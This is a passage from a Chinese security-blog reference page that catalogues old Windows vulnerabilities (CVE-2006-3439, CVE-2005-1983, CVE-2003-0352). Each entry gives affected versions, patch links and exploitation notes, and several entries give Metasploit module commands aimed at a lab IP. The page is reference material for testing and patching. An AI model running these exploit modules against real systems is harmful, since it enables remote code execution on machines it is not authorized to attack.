Product	Version	Update	Edition
Windows 2000		SP4
Windows 2003 Server	R2
Windows 2003 Server	SP1
Windows 2003 Server	SP1		Itanium
Windows 2003 Server	64-bit
Windows 2003 Server	Itanium
Windows Xp		SP1	Tablet Pc
Windows Xp		SP2	Tablet Pc
Windows Xp			64-bit

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2006-3439

利用方式

msf 利用测试系统windows server 2000 sp4 x86

use exploit/windows/smb/ms06_040_netapi
set RHOST 192.168.1.17
run

CVE-2005-1983

描述

PnP服务中基于堆栈的缓冲区溢出使远程攻击者可以通过精心制作的数据包执行任意代码，而本地用户可以通过恶意应用程序获取特权， Zotob（又名Mytob）蠕虫。

影响版本

Product	Version	Update	Edition	Tested
Windows 2000
Windows Xp		SP1	Tablet Pc

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2005-1983

利用方式

暂无

CVE-2003-0352

描述

某些RPC的DCOM接口中的缓冲区溢出使远程攻击者可以通过格式错误的消息执行任意代码

影响版本

Product	Version	Update	Edition
Windows 2000
Windows 2000		SP1
Windows 2000		SP2
Windows 2000		SP3
Windows 2000		SP4
Windows 2003 Server	R2		64-bit
Windows 2003 Server	R2		Datacenter 64-bit
Windows 2003 Server	WEB
Windows 2003 Server	Enterprise		64-bit
Windows 2003 Server	Enterprise 64-bit
Windows 2003 Server	Standard		64-bit
Windows Nt	4.0	SP1	Server
Windows Nt	4.0	SP5	Server
Windows Nt	4.0	SP4	Enterprise Server
Windows Nt	4.0		Enterprise Server
Windows Nt	4.0	SP6	Workstation
Windows Nt	4.0	SP2	Workstation
Windows Nt	4.0	SP1	Terminal Server
Windows Nt	4.0	SP5	Terminal Server
Windows Nt	4.0	SP4	Server
Windows Nt	4.0		Server
Windows Nt	4.0	Sp6a	Enterprise Server
Windows Nt	4.0	SP3	Enterprise Server
Windows Nt	4.0	SP5	Workstation
Windows Nt	4.0	SP1	Workstation
Windows Nt	4.0	SP4	Terminal Server
Windows Nt	4.0		Terminal Server
Windows Nt	4.0	Sp6a	Server
Windows Nt	4.0	SP3	Server
Windows Nt	4.0	SP6	Enterprise Server
Windows Nt	4.0	SP2	Enterprise Server
Windows Nt	4.0	SP4	Workstation
Windows Nt	4.0		Workstation
Windows Nt	4.0	Sp6a	Terminal Server
Windows Nt	4.0	SP3	Terminal Server
Windows Nt	4.0	SP6	Server
Windows Nt	4.0	SP2	Server
Windows Nt	4.0	SP1	Enterprise Server
Windows Nt	4.0	SP5	Enterprise Server
Windows Nt	4.0	Sp6a	Workstation
Windows Nt	4.0	SP3	Workstation
Windows Nt	4.0	SP6	Terminal Server
Windows Nt	4.0	SP2	Terminal Server
Windows Xp			64-bit
Windows Xp			Home
Windows Xp		Gold	Professional
Windows Xp		SP1	64-bit
Windows Xp		SP1	Home

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2003-0352

利用方式

测试系统windows 2000 sp4 x86

use exploit/windows/dcerpc/ms03_026_dcom
set RHOST 192.168.1.17
run

查看系统信息

本文作者：ascotbe

本文为安全脉搏专栏作者发布，转载请注明：https://www.secpulse.com/archives/144478.html

Tags: CVE-2011-1249、CVE-2011-2005、CVE-2012-0217、CVE-2013-0008、CVE-2013-1332、CVE-2013-1345、CVE-2013-5065、CVE-2014-1767、CVE-2014-4076、CVE-2014-4113、CVE-2015-0002、CVE-2015-0003、CVE-2015-0057、CVE-2015-0062、CVE-2015-1701、CVE-2015-1725、CVE-2015-2370、CVE-2015-2546、CVE-2016-0051、CVE-2016-0095、CVE-2016-0099、windows、权限提升

点赞： 2 评论：0 收藏： 2

积分 30 金币 33

快来写下你的想法吧！

	ascotbe
	文章数：12	积分： 190

安全问答社区

脉搏官方公众号

活动日程

2022-06-17

Gdevops 全球敏捷运维峰会

2022-05-12

Mastering the Challenge！——来自The 3rd AutoCS 2022智能汽车信息安全大会的邀请函

2021-11-18

AutoSW 2021智能汽车软件开发大会

2021-06-27

2021中国国际网络安全博览会暨高峰论坛

2021-05-27

The 2nd AutoCS 2021智能汽车信息安全大会

2020-12-18

贝壳找房2020 ICS安全技术峰会

2020-12-11

全球敏捷运维峰会（Gdevops2020）

2020-12-04

2020京麒网络安全大会

2020-11-29

OPPO技术开放日第六期|聚焦应用与数据安全防护

2020-11-27

EISS-2020企业信息安全峰会之上海站 11.27

2020-09-24

CSDI summit中国软件研发管理行业技术峰会

2020-09-23

2020中国国际智慧能源暨能源数据中心与网络信息安全装备展览会

2020-07-31

EISS-2020企业信息安全峰会之北京站 | 7.31（周五线上）

2020-04-15

看雪.安恒 2020 KCTF 春季赛

2020-01-09

相约本地生活安全沙龙暨白帽子颁奖典礼

脉搏文库

安全建设

其他

近20年Windows权限提升集合（下）

复现环境

CVE-2016-0095

描述

影响版本

修复补丁

利用方式

CVE-2016-0099

描述

影响版本

修复补丁

利用方式

CVE-2016-0051

描述

影响版本

修复补丁

利用方式

CVE-2015-2546

描述

影响版本

修复补丁

利用方式

CVE-2015-2370

描述

影响版本

修复补丁

利用方式

CVE-2015-0003

描述

影响版本

修复补丁

利用方式

CVE-2015-1725

描述

影响版本

修复补丁

利用方式

CVE-2015-1701

描述

影响版本

修复补丁

利用方式

CVE-2015-0062

描述

影响版本

修复补丁

利用方式

CVE-2015-0057

描述

影响版本

修复补丁

利用方式

CVE-2015-0002

描述

影响版本

修复补丁

利用方式

CVE-2014-4076

描述

影响版本

修复补丁

利用方式

CVE-2014-4113

描述

影响版本

修复补丁

利用方式

CVE-2014-6321

描述

影响版本

修复补丁

利用方式

CVE-2014-1767

描述

影响版本

修复补丁

利用方式